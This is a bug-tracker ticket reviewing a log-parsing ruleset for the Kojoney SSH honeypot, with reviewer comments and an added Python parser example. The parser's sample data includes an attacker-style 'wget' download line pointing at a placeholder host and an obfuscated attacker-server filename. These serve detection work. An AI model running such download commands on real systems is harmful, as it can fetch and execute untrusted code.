
Bug #245

New LML-Ruleset for Kojoney SSH Honeypot - please review

Added by almost 14 years ago. Updated almost 12 years ago.

Status:
Closed
Priority:
Normal
Target version:
Start date:
Due date:
% Done:

0%

Resolution:
fixed

kojoney.rules (6.43 KB) , 07/06/2007 04:35 PM

Associated revisions

Revision 3e90d0f7 (diff)
Added by Pierre Chifflier over 13 years ago

Add new ruleset for Kojoney honeypot (Closes #245).
Thanks to Bjoern Weiland for the initial submission.

git-svn-id: file:///home/yoann/dev/prelude/git/nok/SVN/prelude-lml/trunk@10089 09c5ec92-17d4-0310-903a-819935f44dba

History

#1 Updated by Yoann VANDOORSELAERE almost 14 years ago

Thanks for this contribution!

Here are a few comments concerning the ruleset. Once the following issues are discussed and/or fixed, we will be able to include this ruleset within the LML distribution.

  • In case the software might report IPv6 attacks, it would be best to match the IP address using (\S+), and leave address.category unspecified (Prelude-Manager Normalizer will take care of setting it appropriately).
  • Instead of setting the login within [[AdditionalData]], did you investigate whether setting it within target User/UserID (with category set to os-device) would be appropriate?
  • commandline should probably be spelled command line
  • (executing .*|COMMAND .*): The command is interesting information that should be captured and assigned within an IDMEF field. Additionally, in the case where executing is matched, you might want to set the target.process entry with the name of the process (and the path, if you are able to retrieve it).
  • Saved the file .*: No need for the wildcard here, you can just use:
    \[SSHChannel session \(\d+\) on SSHService ssh-connection on SSHServerTransport,\d+,([\d\.]+)\] Saved the file
  • Additionally, is there any reason you don't assign the saved filename information within the IDMEF message?
  • In all Kojoney log messages, what does the number following SSHServerTransport correspond to (example: SSHServerTransport,*3*)?

Hope this helps,

#2 Updated by over 13 years ago

  • No IPv6 here, either
  • The Login may be set within the mentioned field, as I said, currently I cannot test it as our systems are down. If you feel this would be the right place to put it, why not... I don't know where it would appear in Prelude though
  • Command line spelling can be changed
  • Command should be assigned to which IDMEF field?
  • There is a reason why I don't assign the saved filename, as it is getting obfuscated and does not really look nice. One could think about it, though. Looks like http+_evilserver_xhost_ro_e_tgz300
  • The number in the log messages is some kind of ID, just a continuously increasing number for each connect
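
Added example (not part of this ticket, the attached kojoney.rules, or the prelude-lml ruleset): a small Python parser that applies the changes discussed in comments #1 and #2 to constructed Kojoney-style log lines. It matches the source address with (\S+) so an IPv6 address is accepted, leaves address.category unset for the Prelude-Manager normalizer, captures the executed command for target.process name/path, and captures the saved file name. The log-line prefix follows the pattern quoted in comment #1; the sample lines, the choice to place the full command line and the saved filename under AdditionalData, and the dict key names are assumptions made for this example.

```python
import re
from typing import Optional

# Prefix shared by the Kojoney messages quoted in the thread. The source address
# is captured with (\S+) instead of [\d\.]+ so an IPv6 address also matches;
# address.category is deliberately not set here (the normalizer fills it in).
PREFIX = (r"\[SSHChannel session \(\d+\) on SSHService ssh-connection "
          r"on SSHServerTransport,(?P<conn_id>\d+),(?P<src>\S+)\] ")

RULES = [
    # "executing <cmd>" / "COMMAND <cmd>": capture the command rather than discard it.
    ("command", re.compile(PREFIX + r"(?:executing|COMMAND) (?P<command>.+)$")),
    # "Saved the file <name>": the rule needs no wildcard, but the name is captured.
    ("saved_file", re.compile(PREFIX + r"Saved the file (?P<filename>.+)$")),
]


def parse_line(line: str) -> Optional[dict]:
    """Map one Kojoney log line to a dict of IDMEF-like field names.

    Key names are assumptions for this example: target.process.name/path for an
    executed command (as suggested in comment #1), AdditionalData entries for the
    full command line and the saved file name.
    """
    for kind, rx in RULES:
        m = rx.match(line)
        if not m:
            continue
        out = {
            "kind": kind,
            "source.node.address.address": m.group("src"),
            "connection_id": int(m.group("conn_id")),  # the per-connection counter
        }
        if kind == "command":
            cmd = m.group("command").strip()
            parts = cmd.split()
            argv0 = parts[0] if parts else ""
            out["target.process.name"] = argv0.rsplit("/", 1)[-1]
            if argv0.startswith("/"):
                # Only an absolute argv[0] gives a reliable path.
                out["target.process.path"] = argv0
            out["AdditionalData.command line"] = cmd
        else:
            out["AdditionalData.saved file"] = m.group("filename").strip()
        return out
    return None  # line matched no rule


def parse_all(lines) -> list:
    """Parse a sequence of log lines, skipping lines no rule matches."""
    return [r for r in (parse_line(l) for l in lines) if r is not None]


# Constructed sample lines (not taken from the page or from a real Kojoney log).
# The IPv6 line shows why (\S+) is preferred over [\d\.]+ for the address.
SAMPLE_LINES = [
    "[SSHChannel session (0) on SSHService ssh-connection on SSHServerTransport,3,192.0.2.10] executing /bin/uname -a",
    "[SSHChannel session (1) on SSHService ssh-connection on SSHServerTransport,4,2001:db8::1] COMMAND wget http://example.invalid/x",
    "[SSHChannel session (0) on SSHService ssh-connection on SSHServerTransport,3,192.0.2.10] Saved the file http+_evilserver_xhost_ro_e_tgz300",
    "[SSHChannel session (0) on SSHService ssh-connection on SSHServerTransport,3,192.0.2.10] unrelated message",
]

if __name__ == "__main__":
    for record in parse_all(SAMPLE_LINES):
        print(record)
```

Running the block prints three records (two commands, one saved file); the fourth line matches no rule and is dropped, which is the behaviour an LML rule set would show for messages it has no rule for.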

#3 Updated by Pierre Chifflier over 13 years ago

  • Status changed from New to Closed
  • Resolution set to fixed

(In r10089) Add new ruleset for Kojoney honeypot (Closes #245).
Thanks to Bjoern Weiland for the initial submission.

#4 Updated by Yoann VANDOORSELAERE almost 12 years ago

  • Project changed from PRELUDE SIEM to Prelude-LML
  • Category deleted (4)
  • Target version deleted (0.9.11)
